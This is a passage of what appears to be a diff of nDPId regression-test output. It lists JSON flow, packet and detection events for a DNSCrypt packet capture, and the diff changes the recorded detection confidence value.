AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBwgAL0RNMQKAAABjgTMb+4iAbsGBKD1AgwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBsgAL0RNMUKAAABjgTMb4EvAbsGBA3nAg4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBwAub0RWZcKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBsAub0RWZgKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"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"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"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"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciB8gAL0RNMEKAAABjgTMb7cIAbsGBNgLAhABAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiB8Aub0RWZQKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":946739305220,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739305220,"pkt":"ZmZmZmZmRERERERECABFAADQ+LhAADgRZ23DHl4cCgAAASD70jMAvJuWMsmAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"} 
